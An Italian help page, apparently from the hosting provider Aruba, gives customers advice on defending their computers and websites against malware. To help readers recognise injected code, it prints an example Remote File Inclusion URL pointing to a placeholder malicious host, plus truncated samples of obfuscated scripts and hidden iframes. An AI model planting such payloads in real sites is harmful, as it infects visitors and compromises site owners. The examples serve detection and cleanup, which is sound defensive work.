Consigli di sicurezza contro virus e malware

Ecco alcune azioni fondamentali che puoi mettere in pratica:

Pratiche di sicurezza generiche

• Tieni sempre aggiornato il sistema operativo. Gli aggiornamenti servono a correggere vulnerabilità già note che i malware sfruttano facilmente.
• Aggiorna regolarmente il software, in particolare il browser (come Firefox o Chrome) e programmi diffusi come Adobe Acrobat Reader. Le vecchie versioni possono presentare delle vulnerabilità.
• Usa un antivirus aggiornato e avvia periodicamente una scansione completa. Puoi anche usare più di un programma, perché non sempre un singolo antivirus è in grado di rilevare tutti i malaware in circolazione. Per aiutarti nella scelta, consulta siti di confronto come http://www.av-comparatives.org/.
• Attiva sempre un firewall. Se puoi, scegli un firewall avanzato che ti avvisa quando un programma cerca di inviare dati via internet. Anche in questo caso, puoi confrontare le soluzioni disponibili su siti specializzati come http://www.matousec.com/projects/firewall-challenge/.
• Cambia tutte le tue password almeno ogni 3 mesi, non solo quelle legate ai servizi Aruba.

 

Pratiche di sicurezza specifiche per malware

• Non aprire mai allegati eseguibili ricevuti via email, nemmeno se provengono da persone che conosci: il loro dispositivo potrebbe essere stato compromesso.
• Evita di aprire link sospetti ricevuti su social network o in chat come Facebook, Twitter o WhatsApp, soprattutto quelli che promettono funzionalità speciali o ti invitano a scaricare software per tenere sotto controllo amici o simili.
• Non inserire mai i tuoi dati di accesso in risposta a email che parlano di aggiornamenti di database, blocchi del conto corrente o perdite di dati. I fornitori affidabili generalmente non richiedono la password via email.
• Non scaricare né installare software contraffatti o versioni crackate. Anche se sembrano funzionare, spesso contengono malware o trojan pensati per infettare il tuo dispositivo.
• Evita di salvare le password sul computer o nel browser. È meglio digitare ogni volta la password, anche se meno comodo: molti malware cercano proprio i file dove molti software, come FileZilla, memorizzano queste informazioni.
• Usa sempre i protocolli sicuri messi a disposizione da Aruba, come HTTPS, SMTPS, POP3S, IMAPS, FTPS. In questo modo, le credenziali saranno cifrate e anche se intercettate, risulteranno illeggibili.
• Controlla regolarmente il codice della tua Home Page. Se un malware ha raccolto le credenziali FTP, potrebbe aver modificato il tuo sito per infettare anche i visitatori. In questi casi viene spesso inserito codice Javascript offuscato che reindirizza a siti infetti, pur mantenendo l’aspetto originale della pagina.

Per proteggere il tuo sito da attacchi informatici, devi mantenere sicure tutte le applicazioni web pubblicate. Anche se il webserver è protetto, il codice delle pagine può essere sfruttato tramite richieste HTTP appositamente modificate, come nel caso di attacchi XSS o SQL injection.

Ecco cosa puoi fare in base al tipo di applicazione:

Se usi applicazioni sviluppate da terzi

• Verifica spesso la disponibilità di versioni aggiornate. Di solito trovi gli aggiornamenti sul sito ufficiale dello sviluppatore.
• Aggiorna almeno una volta al mese: è il modo più semplice per correggere falle note.
• Anche l’ultima versione può avere vulnerabilità. Per controllare la sicurezza del software che usi, puoi consultare portali  come:
  • http://www.securityfocus.com/vulnerabilities
  • http://secunia.com/search/ 
• Se scopri che un'app non è più sicura, sospendila o cerca un'alternativa affidabile.

 

Se sviluppi le applicazioni da solo

• Proteggile da attacchi come Remote File Inclusion (RFI): evita che si possano caricare file esterni tramite URL. Esempio di URL malevolo: http://www.nomedominio.estensione/index.php?pagina=http://www.sitomalevolo.com/malware.php
• Verifica che il tuo codice non sia vulnerabile a SQL injection: è una tecnica per eseguire query dannose nel tuo database. Puoi approfondire sul sito http://it.wikipedia.org/wiki/SQL_injection.
• Consulta guide affidabili online su come scrivere codice sicuro, in base al linguaggio che usi (PHP, JavaScript, ecc.).

La sicurezza delle applicazioni web dipende anche da te: aggiorna, testa e monitora regolarmente ogni componente del tuo sito.

Intervieni subito per evitare danni maggiori. Ecco cosa puoi fare:

• Rimuovi il codice malevolo presente nelle pagine del tuo sito. Se hai bisogno di supporto apri una richiesta di assistenza.
• Controlla se il tuo PC è infetto, anche con una scansione online. Puoi usare tool gratuiti come:
  • https://www.trendmicro.com/it_it/forHome/products/housecall.html
  • https://www.f-secure.com/it/home/support
  • https://www.broadcom.com/solutions/symantec-security-solutions

• Verifica tutti i dispositivi usati per pubblicare il sito, compresi quelli di eventuali collaboratori o webmaster: basta un solo computer infetto per compromettere le credenziali di accesso.
• Aggiorna le applicazioni web che utilizzi sul sito. Le versioni obsolete possono contenere vulnerabilità facilmente sfruttabili da malware.
• Ripulisci il computer con antivirus e anti-malware, poi attiva un buon firewall e tutte le protezioni necessarie per evitare nuove infezioni.
• Cambia tutte le credenziali di accesso usate in precedenza su pannelli, caselle email, FTP, database, ecc. Anche se il tuo PC sembra pulito, i dati potrebbero già essere stati intercettati. Se usi le stesse credenziali anche per servizi esterni come home banking, social network o altro, cambiale subito ed eventualmente contatta il supporto dei relativi fornitori.

 

Anche se non rilevi malaware attivi sul tuo computer, cambia comunque tutte le credenziali di accesso: quelle usate in precedenza potrebbero essere già state compromesse.
 

Se vuoi verificare la presenza di codice malevolo o migliorare la sicurezza del tuo computer, puoi usare questi strumenti affidabili:

Rimozione malware (Windows e Linux)

• Zeus Trojan Remover v1.2.0: http://www.novirusthanks.org
• Malwarebytes: http://www.malwarebytes.org/

Antivirus e firewall (Windows, Linux, Unix)

• Avira: http://www.avira.com/it/index

Assicurati sempre di scaricare gli strumenti solo dai siti ufficiali per evitare ulteriori rischi di compromissione

 

Se un’applicazione web presenta vulnerabilità o se le credenziali del tuo sito vengono compromesse, potresti ritrovare del codice dannoso inserito nelle pagine del sito.

Ecco alcuni esempi di codice sospetto che dovresti rimuovere subito, se lo individui:

<script>
function v47e ...etc... 4950543E'));
</script>
<iframe src='http://url_contenente_malware' width='1' height='1' style='visibility: hidden;'></iframe>
<script language="javascript">
$= ...etc... ;eval(unescape($));document.write($);
</script>
<!-- ~ -->
<div style="visibility:hidden">
<iframe src="http://url_contenente_malware" width=100 height=80></iframe>
</div>
<!-- ~ -->

In genere, questi codici malevoli presentano una o più delle seguenti caratteristiche:

• usano la proprietà visibility: hidden per non essere visibili durante la navigazione del sito;
• sono offuscati o codificati per nascondere il contenuto nel codice sorgente della pagina;
• richiamano risorse esterne a server non Aruba, spesso compromessi e utilizzati per diffondere malware.

Se noti uno o più di questi elementi nelle tue pagine web, rimuovi subito il codice e modifica le credenziali di accesso.

Alcune applicazioni web, se non aggiornate o configurate correttamente, possono presentare vulnerabilità sfruttabili da chi tenta di compromettere un sito.

Tra le più comuni:

• CMS e portali

phpNuke, PostNuke, Mambo, Joomla!, WordPress, ASPNuke, Invision, SFM

Molti di questi sistemi, se non mantenuti aggiornati, possono essere sfruttati con attacchi noti.

• Guestbook

Web Wiz, Matt e altri sistemi simili.

• Forum

phpBB, Invision, vBulletin, Snitz, ecc.

• Moduli e plugin per CMS

Gallerie immagini, chat, sistemi avatar, moduli upload file, ecc.

• Applicazioni PHP gratuite

ODP Script ipershop, phpODP, script in ASP/VBScript.encode, con database Access (es. iper_ita.mdb)

Anche file condivisi tramite BitTorrent possono contenere codice dannoso: evita l’uso di file torrent sul server.

Se un’applicazione causa instabilità al server che ospita il tuo dominio, Aruba invia una notifica all’email associata al dominio stesso.

Per proteggerti da popup indesiderati e dialer dannosi, segui queste buone pratiche.

• Mantieni aggiornato il browser che usi per navigare come per esempio Chrome, Firefox, Edge: gli aggiornamenti risolvono molte vulnerabilità sfruttate da questi contenuti.
• Abilita il blocco dei popup dalle impostazioni del browser. Puoi anche installare estensioni aggiuntive come uBlock Origin o AdBlock Plus.
• Installa un buon antivirus e un anti-malware: molti riconoscono e bloccano i dialer prima che si attivino.
• Non scaricare software da siti non ufficiali o sospetti, in particolare quelli che promettono funzioni extra o gratuite.
• Evita di aprire allegati o link in email sospette, anche se sembrano provenire da contatti affidabili.
• Disattiva l’esecuzione automatica di script attivi come ActiveX, JavaScript o Java se non ne hai necessità, soprattutto su siti sconosciuti.

Se noti comportamenti anomali durante la navigazione come finestre che si aprono da sole, avvisi falsi o redirect continui, esegui subito una scansione completa del sistema con più software di sicurezza aggiornati.